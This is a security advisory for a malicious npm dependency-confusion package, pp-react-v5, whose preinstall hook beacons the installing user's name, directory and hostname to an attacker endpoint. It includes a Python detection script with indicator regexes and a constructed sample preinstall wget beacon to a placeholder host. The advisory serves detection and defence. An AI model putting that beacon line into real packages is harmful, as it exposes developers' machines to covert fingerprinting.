MAL-2026-3509
Malicious code in pp-react-v5 (npm)
Details
`pp-react-v5` is a dependency confusion package published at the inflated version `10.0.0` to win npm resolution over any internally-hosted package of the same name. The package contains only a `package.json` with no functional source code.
On installation the `preinstall` script executes a `wget` command that sends a GET request to `http://q9ou9xtw.requestrepo.com/` with the current username (`whoami`), working directory (`pwd`), and hostname as query parameters, beaconing the victim machine's identity to the attacker-controlled endpoint.
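The two traits described above (a manifest-only package and a lifecycle script that reaches out with host identity) are easy to check for before `npm install` runs anything. The following is an added example, not code from the advisory or from any scanner it cites: a small Python audit over an unpacked package's files. The function names (`audit_package`, `audit_scripts`), the indicator patterns, the sample manifests and the placeholder host `collector.example.invalid` are all constructed for illustration.

```python
"""Added example (not part of the OSV advisory): audit an unpacked npm package
for install-time beacons and manifest-only dependency-confusion packages."""
import json
import re

# npm lifecycle hooks that run automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators. Legitimate build scripts can trip these, so a hit is a
# review item; the verdict below combines them with structural signals.
INDICATORS = {
    "network_tool": re.compile(r"\b(wget|curl)\b"),
    "host_fingerprint": re.compile(r"\b(whoami|hostname|pwd)\b"),
    "url": re.compile(r"https?://[^\s\"']+"),
}


def audit_scripts(manifest):
    """Return one finding per (hook, indicator) pair seen in lifecycle scripts."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for label, pattern in INDICATORS.items():
            hit = pattern.search(cmd)
            if hit:
                findings.append({"hook": hook, "indicator": label, "match": hit.group(0)})
    return findings


def audit_package(files, internal_names=frozenset()):
    """files: {relative path: content} of an unpacked tarball (constructed here).
    internal_names: names of packages hosted on your private registry.
    Flags a manifest-only package, a name collision with an internal package,
    and suspicious lifecycle scripts; 'block' is the combined verdict."""
    manifest = json.loads(files["package.json"])
    findings = audit_scripts(manifest)
    manifest_only = set(files) == {"package.json"}
    name_collision = manifest.get("name") in internal_names
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "manifest_only": manifest_only,
        "name_collision": name_collision,
        "script_findings": findings,
        # Block when install-time network/fingerprint activity coincides with a
        # package that ships no code or collides with an internal name.
        "block": bool(findings) and (manifest_only or name_collision),
    }


# Constructed sample mirroring the shape described in the advisory; the host is
# a placeholder, not the real collector.
SAMPLE_FILES = {
    "package.json": json.dumps({
        "name": "pp-react-v5",
        "version": "10.0.0",
        "scripts": {
            "preinstall": 'wget -q "http://collector.example.invalid/?u=$(whoami)&d=$(pwd)&h=$(hostname)"'
        },
    })
}

# Constructed benign counterpart: ships source, has no lifecycle scripts.
BENIGN_FILES = {
    "package.json": json.dumps({"name": "pad-util", "version": "1.2.0", "main": "index.js"}),
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
}

if __name__ == "__main__":
    internal = {"pp-react-v5"}  # assumption: this name exists on a private registry
    print(json.dumps(audit_package(SAMPLE_FILES, internal), indent=2))
    print(json.dumps(audit_package(BENIGN_FILES, internal), indent=2))
```

The structural signals matter more than the regexes: a package whose only file is `package.json` has no reason to run a `preinstall` hook at all. As a standing control, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops lifecycle scripts from running during install, and pinning internal package names to a private registry via scoped `@org/` names removes the resolution race that dependency confusion relies on.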
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (667950ffe2ed24a98495c0d8d6c3430e3538523c5811caf9fbda829b0773163f)

The package pp-react-v5 was found to contain malicious code.
## Source: ossf-package-analysis (b2291adfbdded958f2fa2a51aa5e582d8ec4bad5bb1c5c9b614bd496732c3578)

The OpenSSF Package Analysis project identified 'pp-react-v5' @ 10.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Affected packages

No fixed version published yet for pp-react-v5 (npm). Pin to a known-safe version or switch to an alternative.